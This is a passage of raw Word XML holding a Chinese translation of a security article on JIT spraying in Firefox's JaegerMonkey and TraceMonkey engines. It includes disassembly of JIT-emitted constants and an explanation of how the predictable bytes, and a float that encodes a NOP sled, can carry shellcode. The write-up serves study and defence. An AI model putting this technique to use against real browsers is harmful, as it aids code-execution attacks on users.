              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x24（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>），％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="2BB58474" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E2E6EE7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a0a0：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3661788C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545A6A86" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0xffff0001,0x1c（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="7DFD564D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DA70D96" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0 X 40 A0：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC11D37" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="578AAC35" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$ 0x45454545,0x18（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）;第四常数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="428A12F6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AE4BB22" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a0ae：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33EC0E99" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F8D82E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>，％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="513EF2F9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46062E54" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a0b0：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762C1784" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="148F1C57" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x24（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>），％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="5489F86B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76FC0B3A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a0b3：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E47A8EE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E288BD9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0xffff0001,0x24（％ed）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="06DED2DB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C0C12FD" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19" w:line="161" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a0ba：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06413FE4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19" w:line="161" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103CC85A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19" w:line="161" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$ 0x56464646,0x20（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）;第五常数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D4BCAD7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="161" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1500" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB1652F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63839610" w14:textId="6B766B6C" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="93" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="515"/>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上面的汇编代码分配了一个新的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JSObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实例来表示常量数组。存储在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>返回值将移至</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>寄存器。这指向本机对象，并通过0x24字节</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的偏移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以获取slot成员数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>组，该成员数组将保存我们的JavaScript数组的内容。由于数组的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>每个成员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>都是整数，因此该操作是一条简单的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>movl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指令，它将</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>写入值</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类型（JSVAL_TYPE_INT32 = 0xffff0001），然后是整数值本身。正如我们在本文前面的部分所述，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引擎不会产生高度优化的代码。从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>寄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存器中的返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值将obj地址重复加载到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>寄存器中可以看出这一点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A20C36C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F5D761" w14:textId="187C2D86" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="368"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原始的JIT</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> spray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>技术产生了更简单的本机代码，该代码将常量移到寄存器中并反复调用XOR指令。尽管</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成的JIT</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>spary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码稍微复杂一些，但仍可以完全预测，因为它使用32位</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>寄存器作为object-&gt; slots数组的索引来添加新的数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>组常量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这意味着字节序列的大小和内容都是可预测的，并且仍然可以从中构建shellcode。这与常量相对于代码页开始处的固定偏移量相结合，这意味着我们可以毫无疑问地猜测它们与页基地址的偏移量是多少。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23549994" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F948779" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="741"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一些读者可能已经注意到/ test /正则表达式添加到了数组的末尾。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这是为了强制生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成快速路径（发出JIT代码），而不是在字节码生成过程中更早地</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>优化仅整数</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E1C74" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E364C69" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也可以通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引擎进行JIT Spray。通过使用浮点值，我们能够实现更严格的代码发射。在32位x86体系结构上，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>浮点值</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">将占用64位内存。如果我们在JavaScript中采用浮点值，例如-6.828527034422786e-229，则该值将在内存中表示为以下十六进制字符串0x9090909090909090。 </w:t>
      </w:r>
      <w:r>
        <w:t>0x90字节是x86体系结构中的NOP指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E0973" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5D5692" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>原始JavaScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACEF80E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
